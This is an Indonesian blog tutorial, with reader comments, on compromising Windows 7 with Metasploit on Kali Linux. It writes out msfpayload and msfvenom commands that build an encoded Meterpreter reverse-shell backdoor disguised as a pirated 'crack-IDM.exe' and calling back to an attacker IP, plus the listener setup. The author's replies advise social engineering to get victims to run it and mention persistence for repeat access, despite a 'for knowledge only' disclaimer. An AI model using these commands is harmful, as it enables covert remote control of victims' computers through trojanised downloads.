Hai broo,
Kali ini saya akan memberikan tutorial tentang Cara Exploit Windows 7 dengan Metasploit di Kali Linux. bagi yang belum tau apa itu metasploit, kalian bisa cari sendiri di google :p
oke langsung saja broo
Pertama kita jalankan terlebih dahulu service postgresql dan metasploit
service postgresql start
service metasploit start
Nah selanjutnya kita buat backdor dengan msfpayload
msfpayload windows/meterpreter/reverse_tcp LHOST=10.236.23.139 LPORT=4444 x > /root/Desktop/crack-IDM.exe
LHOST = IP attacker, sesuaikan dengan IP anda
LPORT= Port Listener
/root/Desktop/= letak directori backdor yang di buat
crack-IDM.exe = nama Backdoor nya
Update!!
Karena pada versi Kali Linux yang terbaru dalam pembuatan backdoor sudah tidak lagi menggunakan msfpayload, dan di ganti dengan msfvenom jadi perintahnya sebagai berikut,
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 LHOST=10.236.23.139 LPORT=4444 -f exe > /root/Desktop/crack-IDM.exe
Kita juga dapat mebuat backdoor dengan format yang lainnya, kalian bisa lihat postingan saya tentang
Selanjutnya kita buka msfconsole, ketikkan di terminal
msfconsoleLalu ketikkan jenis exploit yang kita gunakan
use exploit/multi/handler
Lalu pilih payload yang digunakan
set payload windows/meterpreter/reverse_tcp
Tentukan LHOST (sesuaikan dengan ip anda harus sma saat pembuatan backdor)
set LHOST 10.236.23.139
set LPORT 4444
Sekarang kita jalankan exploit,
Untuk mendapatkan akses ke sistem target, kita arus mengirimkan backdoor ke target dan target harus mengkesekusi backdoor tersebut
 |
| Sesi Meterpreter 1 terbuka |
Tanda bahwa target sudah mengeksekusi backdoor yang kita buat tadi, dan kita sudah berhasil memasuki sistem korban.
Dibawah ini contoh perintah meterpreter untuk melihat informasi sistem korban
Dan masih banyak lagi perintah-perintah meterpreter yang dapat di jalankan.
Oke sampai disini dulu yang dapat saya bagikan kali ini tentang Exploit Windows 7 Dengan Metasploit di Kali Linux, Postingan ini dibuat hanya untuk pengetahuan semata, agar kita lebih
hati-hati dalam menerima atau mendownload aplikasi atau file dari sumber
yang tidak dikenal, segala penyalahgunaan dari tutorial ini bukan tanggung jawab saya. Terimakasih
nah klo korban tidak mengeksekusi backdor gmna tuh gan? seharusnya walapun korban tidak megeksekusi kita bsa masuk k komputer korban,,nahh tuh bagaimana caranya :p
BalasHapusYaaa.. gimana caranya agan harus bisa buat target meng-install backdoor yang agan buat. Social engineering agan juga harus baik :>)
Hapusbos kalau cara manggilnya gimana???misal sebelumnya si korban udah eksekusi tu backdor trus komputernya di restart / di matiin,,kalu sewaktu2 kita mw masuk lagi tanpa harus ngulang langkahnya dari awal bisa ngk bos????
BalasHapusbisa banget mas :d dengan cara menanamkan backdoor permanent di komputer korban,
Hapusbisa lihat artikel saya tentang Maintaining Acces dengan Persistence Metasploit
mas, caranya ngirim pesannya gi mn?
BalasHapusplissss..... mohon bantuannya :))
gan kalo misal komputer target pakai koneksi internet yang sama dengan kita dan kita berhasil mendapatkan ip nya, terus kalo komputer target ganti lagi koneksi nya dan berbeda dengan koneksi kita maka ip nya mun akan berbeda , jadi gimana ? apa cara ini cuma bisa dipake buat yang satu koneksi ajaa ?
BalasHapus